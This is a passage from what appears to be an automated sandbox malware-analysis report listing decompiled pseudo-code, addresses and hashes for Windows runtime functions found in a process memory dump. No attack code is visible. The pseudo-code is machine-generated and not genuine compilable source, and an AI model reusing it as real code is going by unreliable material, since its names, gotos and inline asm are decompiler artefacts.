					E0161F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E015F7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01619AE0();
					_t24 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01657799
0x0165779a
0x0165779b
0x016577a3
0x016577ab
0x016577ae
0x016577b1
0x016577b1
0x016577bf
0x016577c4
0x016577c8
0x016577ce
0x016577d4
0x016577e0
0x016577e0
0x016577d6
0x016577d6
0x016577de
0x00000000
0x00000000
0x016577de
0x016577e5
0x016577f0
0x016577f3
0x016577f6
0x016577fd
0x01657800
0x0165780c
0x01657818
0x0165782b
0x0165781a
0x01657823
0x01657823
0x01657830
0x01657831
0x01657838
0x0165783d
0x0165783e
0x0165784f
0x0165784f
0x0165785a

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f5ac552947b81a98b2af159b245a927c8412e0cd07f8f02dbaead72db7b2b9
Instruction ID: 598711321ed0623bfb51d43010111aff9d72f158f4181901ec51e4b7a6f412c5
Opcode Fuzzy Hash: b6f5ac552947b81a98b2af159b245a927c8412e0cd07f8f02dbaead72db7b2b9
Instruction Fuzzy Hash: 2A216D72900605ABC725DF69DC90EABBBA9EF88740F14456DEA0ADB750D734E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 015FAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E015FAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E015F7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E015F7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E015F7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E015F7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01657794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x015fae78
0x015fae7c
0x015fae7e
0x015fae81
0x015fae86
0x015fae8d
0x01642691
0x015fae93
0x015fae93
0x015fae93
0x015fae98
0x015fae9d
0x016426a2
0x016426b4
0x016426a4
0x016426ad
0x016426ad
0x016426b9
0x00000000
0x016426bb
0x00000000
0x016426bb
0x015faea3
0x015faea3
0x015faea3
0x015faeaa
0x016426c0
0x016426c9
0x016426c9
0x015faeb3
0x016426d4
0x016426e1
0x00000000
0x00000000
0x016426e7
0x016426ee
0x016426f0
0x016426f9
0x016426f9
0x01642702
0x01642708
0x01642708
0x0164270b
0x0164270f
0x01642711
0x01642711
0x01642725
0x01642725
0x00000000
0x015faeb9
0x015faeb9
0x015faebf
0x015faebf
0x015faeb3

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 3f674b8af2d99413124c2c88d6eb2378feddf143c8525e9c6cf2f4eda8750925
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 7E21D4326016929FEB16DF29DD54B257BE9FF44640F2900A8EF088F792D734DC40C691

Uniqueness

Uniqueness Score: -1.00%

Function 0160FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0160FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E015E76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0160fd9b
0x0160fda0
0x0160fda1
0x0160fdab
0x0160fdad
0x0160fdb0
0x0160fdb8
0x0160fe0f
0x0160fde6
0x0160fde9
0x0160fdec
0x0164c0c0
0x0160fdfe
0x0160fe06
0x0160fe06
0x0164c0c8
0x0160fe2d
0x0160fe2d
0x00000000
0x0160fe2d
0x0164c0d1
0x0164c0e0
0x0164c0e5
0x0164c0e5
0x0164c0e8
0x00000000
0x0164c0e8
0x0160fdf4
0x00000000
0x00000000
0x0160fdf6
0x0160fdfa
0x0160fe1a
0x0160fe1f
0x0160fe1f
0x0160fdfc
0x00000000
0x0160fdfc
0x0160fdcc
0x0160fdd0
0x0160fe26
0x00000000
0x0160fe26
0x0160fdd8
0x0160fddb
0x0160fddd
0x0160fde0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 4507d0369db1c8d271473c292cb7de30a2b9690bc39634418fbb9e2bf2498ff6
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 65217C72640641DBD73ACF4DC940A67F7E5FB94A10F2481AEE9558B7A1D731AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0160B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0160B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E015F2280(_t12, 0x16c8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E016100C2(0x16c8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0160b395
0x0160b3a2
0x0160b3a5
0x0160b3aa
0x0160b3b2
0x0160b3ba
0x0160b3bd
0x0160b3c0
0x0160b3c4
0x0160b3c9
0x0164a3e9
0x0164a3ed
0x0164a3f0
0x0164a3ff
0x0164a403
0x0164a409
0x00000000
0x00000000
0x0164a40b
0x0164a40b
0x0164a40f
0x0164a415
0x0164a423
0x0164a423
0x0164a415
0x0160b3d1
0x0160b3e8
0x0160b3e8
0x0160b3d9

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97cb408c8fc795dd102727f60ab1be5dddc65116ccfd0f6fa652b9d33270f0df
Instruction ID: ec1a96e75802396462bf15955047cf0a426cb58e822d3b1d4fd3c494d7998b99
Opcode Fuzzy Hash: 97cb408c8fc795dd102727f60ab1be5dddc65116ccfd0f6fa652b9d33270f0df
Instruction Fuzzy Hash: 351148373051209BCB2E8A599D81A6B735BEBC5630B38412DDE16CB3C0DE31AC02C694

Uniqueness

Uniqueness Score: -1.00%

Function 015D9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E015D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x16af708);
				E0162D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E016195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E016195D0();
				_t33 =  *0x16c84c4; // 0x0
				L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x16c84c4; // 0x0
				L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x16c84c4; // 0x0
				E015F2280(L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x16c86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E016195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E016195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E015D9325();
					_t50 =  *0x16c84c4; // 0x0
					return E0162D0D1(L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x015d9240
0x015d9242
0x015d9247
0x015d924c
0x015d924e
0x015d9255
0x015d9257
0x015d925a
0x015d925f
0x015d925f
0x015d9266
0x015d9271
0x015d9276
0x015d9279
0x015d927e
0x015d9295
0x015d929a
0x015d92b1
0x015d92b6
0x015d92d7
0x015d92dc
0x015d92e0
0x015d92e6
0x015d92e8
0x015d92ee
0x015d9332
0x015d9333
0x015d9337
0x015d9338
0x015d933a
0x015d933a
0x015d933d
0x015d9342
0x015d9342
0x015d9345
0x015d9349
0x015d934e
0x015d9352
0x015d9357
0x015d92f4
0x015d92f4
0x015d92f6
0x015d92f9
0x015d9300
0x015d9306
0x015d9324
0x015d9324

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b558ba7aa45a93f0a7bdd9f2dd7712bcb2a00b7db766b2e1f11bb00457bba6a
Instruction ID: 6f43c5d8602755f3ea8f87ee6428e0f6328e2bb8ea5ea761eb978efedb8fce77
Opcode Fuzzy Hash: 6b558ba7aa45a93f0a7bdd9f2dd7712bcb2a00b7db766b2e1f11bb00457bba6a
Instruction Fuzzy Hash: 49211671052A02DFC732EF68CE40B6AB7B9BF18708F14456CE14A9B6A2CA34E951CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01664257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01664257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x16b08d0);
				E0162D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E016641E8(__ebx, __edi, __ecx, _t39);
				E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x16c87e4;
					_t18 =  *0x16c87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x16c5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x16c87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x16c87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L015D7055(_t31 + 0xfffffff8);
								_t24 =  *0x16c87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x16c87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x16c5cd0;
				if( *0x16c5cd0 <= 0) {
					L015D7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x16c87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x16c87e8 = _t30;
						 *0x16c87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0162D0D1(L01664320());
			}

0x01664257
0x01664257
0x01664257
0x01664259
0x0166425e
0x01664263
0x01664265
0x01664273
0x01664278
0x0166427c
0x0166427f
0x01664281
0x01664287
0x016642d7
0x016642d7
0x016642da
0x0166428d
0x0166428d
0x0166428f
0x01664292
0x01664297
0x0166429c
0x016642a0
0x016642a6
0x016642a8
0x016642ae
0x016642b3
0x00000000
0x016642ba
0x016642ba
0x016642bf
0x016642c5
0x016642ca
0x016642cf
0x016642d0
0x00000000
0x016642d0
0x016642b3
0x00000000
0x016642a6
0x0166429c
0x016642dc
0x016642dc
0x016642e3
0x01664309
0x016642e5
0x016642e5
0x016642e8
0x016642ee
0x016642f0
0x00000000
0x016642f2
0x016642f2
0x016642f4
0x016642f7
0x016642f9
0x01664300
0x01664300
0x016642f0
0x0166430e
0x0166431f

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c97e68c76ab80920c10fa36973fbad6d1bf5bb8212b810f1ac027620d4c19ad
Instruction ID: 80f59f0ebe8420c8714808fc5f51899a299449364507da087eda38f1894b9e1a
Opcode Fuzzy Hash: 5c97e68c76ab80920c10fa36973fbad6d1bf5bb8212b810f1ac027620d4c19ad
Instruction Fuzzy Hash: DE212770601602CFC735EF69DC40AB9BBA9FF85354B24D26EC1158B399EB35D4A1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01602397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E01602397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x16c848c != 0) {
					L015FFAD0(0x16c8610);
					if( *0x16c848c == 0) {
						E015FFA00(0x16c8610, _t19, _t27, 0x16c8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01602581(0x16c8610, 0x15b50a0, _t26, _t27, _t28);
						E015FFA00(0x16c8610, 0x15b50a0, _t27, 0x16c8610);
					}
				} else {
					L1:
					_t11 =  *0x16c8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01614886(0x15b1088, 1, 0x16c8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01602581(0x16c8610, (_t11 << 4) + 0x15b5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x016023b0
0x016023b6
0x01602409
0x01602415
0x01645ae9
0x00000000
0x0160241b
0x0160241b
0x0160241d
0x01602427
0x0160242e
0x01602430
0x01602430
0x016023b8
0x016023b8
0x016023b8
0x016023bf
0x016023fc
0x016023fc
0x016023c1
0x016023c3
0x016023d0
0x016023d8
0x016023d8
0x016023dc
0x016023de
0x016023e1
0x016023e1
0x016023ec

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d67918f2ba051a29907ed81d460daafd2533251adbb945fe5c1b809356bf23
Instruction ID: 825b9a1c05ff3b8bf3d19cb5c146d063146275de5cd8ba9de19b1bb021cd154d
Opcode Fuzzy Hash: 22d67918f2ba051a29907ed81d460daafd2533251adbb945fe5c1b809356bf23
Instruction Fuzzy Hash: 9F1108326047116BE73A9A2AAC98B27B7DDFFA0610F15441EE606AB2C1DAB0D8458758

Uniqueness

Uniqueness Score: -1.00%

Function 016546A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E016546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0161F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0160D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L015F77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x016546b7
0x016546ba
0x016546c5
0x016546c8
0x016546d0
0x016546d4
0x016546e6
0x016546e9
0x016546f4
0x016546ff
0x01654705
0x01654706
0x0165470c
0x01654713
0x0165471b
0x01654723
0x01654725
0x016546d6
0x016546d9
0x016546db
0x016546db
0x01654732

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: c71b1d9e8413e6a1012294e37df469bc4dc623979739f7d4284d8070b087c562
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 0911E572504209BBCB059F5DD8809BEB7B9EF95310F1080AEF944CB351DA319D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 015DC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E015DC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x16cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E015EEEF0(0x16c70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0165F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E015EEB70(_t29, 0x16c70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0161B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0165F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x16c70c0; // 0x0
					while(_t38 != 0x16c70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x16cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x015dc96a
0x015dc974
0x015dc988
0x015dc98a
0x01647c9d
0x01647c9f
0x01647ca4
0x01647cae
0x01647cf0
0x01647cf5
0x01647cfa
0x015dc992
0x015dc996
0x015dc997
0x015dc998
0x015dc9a3
0x015dc9a3
0x01647cb0
0x01647cb7
0x01647cbb
0x00000000
0x00000000
0x01647cbd
0x01647ce8
0x01647cc5
0x01647cc8
0x01647cca
0x01647cd0
0x01647cd6
0x01647cde
0x01647ce4
0x01647ce4
0x01647cd0
0x00000000
0x01647ce8
0x015dc990
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b18e4fbe1f6ad81f700774e5ebe5872f4bdb13163b710f9f4e559d20ef0c13c
Instruction ID: 1bbaae7b852c0959b8abbdffdb41c4f32e61d5c00018d1af3787960682c574e4
Opcode Fuzzy Hash: 2b18e4fbe1f6ad81f700774e5ebe5872f4bdb13163b710f9f4e559d20ef0c13c
Instruction Fuzzy Hash: 9B11E1327106069FC761AF2CCC86A2B77E6FB94611F00052CE94687651DB20EC10CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 016137F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E016137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E015F2280(_t6, 0x16c8550);
				}
				_t29 = E0161387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E015EFFB0(0x16c8550, _t27, 0x16c8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x016137fa
0x016137fc
0x01613805
0x01613808
0x01613808
0x01613814
0x01613818
0x01613846
0x01613848
0x0161384b
0x0161384b
0x01613852
0x00000000
0x01613854
0x01613856
0x00000000
0x00000000
0x01613863
0x00000000
0x01613863
0x0161381a
0x0161381a
0x0161381f
0x0161386e
0x0161386e
0x01613871
0x01613873
0x01613873
0x01613868
0x00000000
0x01613868
0x01613821
0x01613826
0x00000000
0x00000000
0x01613828
0x0161382a
0x01613841
0x00000000
0x01613841

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e921fa8bd4a996b47e852812a8052d902a5bde1e82de2b025d74de2e74da62
Instruction ID: 91390cc596ac2abdf2bd24c92f4a6c3467231f0f7698118cfe0397bf5195a580
Opcode Fuzzy Hash: c3e921fa8bd4a996b47e852812a8052d902a5bde1e82de2b025d74de2e74da62
Instruction Fuzzy Hash: FE01C4B2A016519BC3778B1E9D40A26BBA6FFC5A7071B406DED5B8B359DB30D801C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 0160002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0160002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E015F7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E015F7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E015F7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E015F7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01600032
0x01600037
0x01600043
0x01644b3a
0x01600049
0x01600049
0x01600049
0x0160004e
0x01600053
0x01644b48
0x01644b5a
0x01644b4a
0x01644b53
0x01644b53
0x01644b5f
0x00000000
0x01644b61
0x00000000
0x01644b61
0x01600059
0x01600059
0x01600060
0x01644b6f
0x01644b6f
0x01600069
0x01644b83
0x00000000
0x00000000
0x01644b90
0x01644b9b
0x01644b9b
0x01644ba4
0x00000000
0x00000000
